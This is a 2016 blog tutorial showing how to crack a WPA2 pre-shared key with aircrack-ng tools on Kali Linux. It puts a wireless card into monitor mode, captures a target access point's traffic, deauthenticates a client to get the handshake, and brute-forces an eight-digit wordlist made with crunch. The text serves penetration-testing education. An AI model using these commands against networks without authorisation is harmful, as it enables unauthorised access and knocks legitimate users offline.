SBM Labs

Cyber Security Collaboration Project

Wi-Fi Attack. WPA2 Pre-Shared Key Cracking.
12 Jun 2016

In this article we will study how attacker can get access to Wi-Fi access point protected with WPA2 PSK. We will use Kali Linux distribution and penetration tools such as aircrack-ng and crunch.

1. Get wireless network interface.

# iwconfig

2. Turn wireless card into monitor mode.

# airmon-ng start wlan0

3. Check compatibility to aircrack-ng.

You can find information about compatibility of wireless chipsets and drivers to aircrack-ng here.

4. Run wireless packet capture.

# airodump-ng wlan0mon

We will crack AP (ESSID) in demonstration purpose. It's MAC address AA:53:95:B8:89:C7 (BSSID) and used channel 1.

5. Capture and save the traffic of defined Wi-Fi access point.

# airodump-ng --bssid AA:53:95:B8:89:C7 -c 1 --write AP wlan0mon

6. Deauthenticate the client.

We need to deauthenticate the client in order to get 4-way hanshake. Client's MAC address 00:26:5E:81:29:8A.

# aireplay-ng -0 1 -a AA:53:95:B8:89:C7 -c 00:26:5E:81:29:8A wlan0mon

In some cases you can get message "Couldn't determine current channel for wlan0mon, you should either force the operation with --ignore-negative-one or apply a kernel patch". As a result your attempt to deauthenticate the client can be failed. I met this problem during aircrack-ng testing in Ubuntu Desktop environment.

Our attempt was successful. So we can see "WPA handshake: AA:53:95:B8:89:C7" in the right top corner of airodump-ng output (Step 5).

Let's check captured packets with Wireshark. We should apply "eapol" as filter in order to see 4-way handshake.

7. Prepary wordlist dictionary.

We suppose that PSK of AP (ESSID) is eight-digit number. We will use password generator crunch in order to prepare dictionary.

# crunch 8 8 0123456789 -o number_password.list

8. Run PSK attack.

# aircrack-ng AP-01.cap -w number_password.list

You should use strong PSK in order to protect access to Wi-Fi access point.